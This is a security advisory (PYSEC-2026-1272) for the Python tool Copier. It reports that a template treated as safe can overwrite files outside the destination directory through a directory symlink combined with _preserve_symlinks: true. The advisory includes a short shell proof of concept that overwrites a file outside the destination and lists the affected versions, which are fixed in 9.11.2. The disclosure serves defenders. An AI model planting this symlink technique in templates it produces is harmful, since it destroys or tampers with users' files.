PYSEC-2026-1272

See a problem?
Import Source
https://github.com/pypa/advisory-database/blob/main/vulns/copier/PYSEC-2026-1272.yaml
JSON Data
https://api.osv.dev/v1/vulns/PYSEC-2026-1272
Aliases
Published
2026-07-07T16:03:19.651307Z
Modified
2026-07-07T17:47:12.903149376Z
Severity
  • 7.1 (High) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H CVSS Calculator
  • 6.9 (Medium) CVSS_V4 - CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N CVSS Calculator
Summary
Copier safe template has arbitrary filesystem write access via directory symlinks when _preserve_symlinks: true
Details

Impact

Copier suggests that it's safe to generate a project from a safe template, i.e. one that doesn't use unsafe features like custom Jinja extensions which would require passing the --UNSAFE,--trust flag. As it turns out, a safe template can currently write to arbitrary directories outside the destination path by using directory a symlink along with _preserve_symlinks: true and a generated directory structure whose rendered path is inside the symlinked directory. This way, a malicious template author can create a template that overwrites arbitrary files (according to the user's write permissions), e.g., to cause havoc.

[!NOTE]

At the time of writing, the exploit is non-deterministic, as Copier walks the template's file tree using os.scandir which yields directory entries in arbitrary order.

Reproducible example (may or may not work depending on directory entry yield order):

mkdir other/
pushd other/
echo "sensitive" > sensitive.txt
popd

mkdir src/
pushd src/
ln -s ../other other
echo "overwritten" > "{{ pathjoin('other', 'sensitive.txt') }}.jinja"
echo "_preserve_symlinks: true" > copier.yml
tree .
# .
# ├── copier.yml
# ├── other -> ../other
# └── {{ pathjoin('other', 'sensitive.txt') }}.jinja
#
# 1 directory, 2 files
popd

uvx copier copy --overwrite src/ dst/

cat other/sensitive.txt
# overwritten

Patches

n/a

Workarounds

n/a

References

n/a

References

Affected packages

PyPI / copier

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
9.11.2

Affected versions

2.*
2.0.0
2.0.1
2.1.0
2.2.1
2.2.2
2.2.3
2.3
2.3.1
2.3.2
2.3.3
2.4.0
2.4.1
2.4.2
2.5.0
2.5.1
3.*
3.0.0a3
3.0.0a5
3.0.0a6
3.0.0a7
3.0.0a8
3.0.0b1
3.0.1
3.0.2
3.0.3
3.0.4
3.0.5
3.0.6
3.1.0
3.2.0
4.*
4.0.0
4.0.1
4.0.2
4.1.0
5.*
5.0.0
5.1.0
6.*
6.0.0a0
6.0.0a2
6.0.0a3
6.0.0a4
6.0.0a5
6.0.0a6
6.0.0a7
6.0.0a9
6.0.0b0
6.0.0
6.1.0
6.2.0
7.*
7.0.1
7.1.0a0
7.1.0
7.2.0
8.*
8.0.0
8.1.0
8.2.0
8.3.0
9.*
9.0.1
9.1.0
9.1.1
9.2.0
9.3.0
9.3.1
9.4.0
9.4.1
9.5.0
9.6.0
9.7.0
9.7.1
9.8.0
9.9.0
9.9.1
9.10.0
9.10.1
9.10.2
9.10.3
9.11.0
9.11.1

Database specific

source
"https://github.com/pypa/advisory-database/blob/main/vulns/copier/PYSEC-2026-1272.yaml"